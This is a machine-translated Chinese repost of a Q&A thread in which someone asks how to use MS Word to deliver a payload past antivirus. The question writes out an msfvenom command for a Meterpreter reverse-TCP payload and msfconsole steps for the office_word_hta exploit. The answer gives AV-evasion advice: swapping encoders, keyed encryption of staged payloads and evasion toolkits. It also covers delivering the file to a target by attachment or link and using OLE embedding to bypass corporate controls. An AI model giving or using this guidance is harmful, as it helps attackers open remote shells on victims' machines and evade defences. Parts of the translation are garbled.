使用office_word_hta
我试图利用MS Word来避免AV检测。那我该怎么做?
首先,生成有效载荷,例如:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 3 -o ~/payload.exe
1.应采用何种文件格式?前科?如果我设置"-f exe",我仍然必须设置名称"payload.exe“而不是”有效负载“?
2.如何选择使用哪些编码器和哪些迭代来避免AV卡巴斯基的检测?试着从一个到另一个还是怎样?
然后我去msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set lhost srvhost 172.20.10.4
msf exploit(office_word_hta) > set srvhost 172.20.10.4
msf exploit(office_word_hta) > set payload generic/custom right?
then set payloadfile pointing to ~/payload.exe?
msf exploit(office_word_hta) > exploit我做得对吗?)
回答 1
Security用户
发布于 2017-10-06 17:37:07
编码
您可以做的几件事是更改有效载荷的编码器-- shikata_ga_nai是一些AVs检测到的一种众所周知的编码方法。
首先,生成未编码的原始外壳代码。
从这里开始,使用另一个工具包(Vil3.0/Vil-406,空巢,Ebowla),它有大量的编码选项。
您还可以使用基于上下文的编码器,它依赖于已知的信息(例如,域、当前上下文的用户名、获取创造性):https://labs.mwrinfosecurity.com/blog/safer-shellcode-implants/ https://github.com/Genetic-Malware/Ebowla。
另一种廉价的编码方法是使用RC4或另一种密码算法(sha-256)对“AAAA”进行多次加密,并让外壳代码执行相同的操作,并强制它(使用它作为密钥)解码分阶段的有效载荷:
http://www.irongeek.com/i.php?page=videos/derbycon7/t301-a-new-take-at-payload-generation-empty-nest-james-cook-tom-steele https://github.com/empty-nest/emptynest
https://github.com/Genetic-Malware/Ebowla
有效载荷
做你的研究!您可以将该文件作为附件提供,或者发送一个良性/错误查找链接,并让目标从您的服务器(通过letsencrypt或msf\impersonate_ssl使用有效的SSL证书加密)提取该文件。
这里有一些旁路,其中之一是您可以将可执行文件嵌入到Microsoft office文档中,这是由于OLE:https://doublepulsar.com/oleoutlook-bypass-almost-every-corporate-security-control-with-a-point-n-click-gui-37f4cbc107d0的缘故。
除此之外,你需要真正知道你的目标,并更加努力!
https://security.stackexchange.com/questions/169431
复制相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号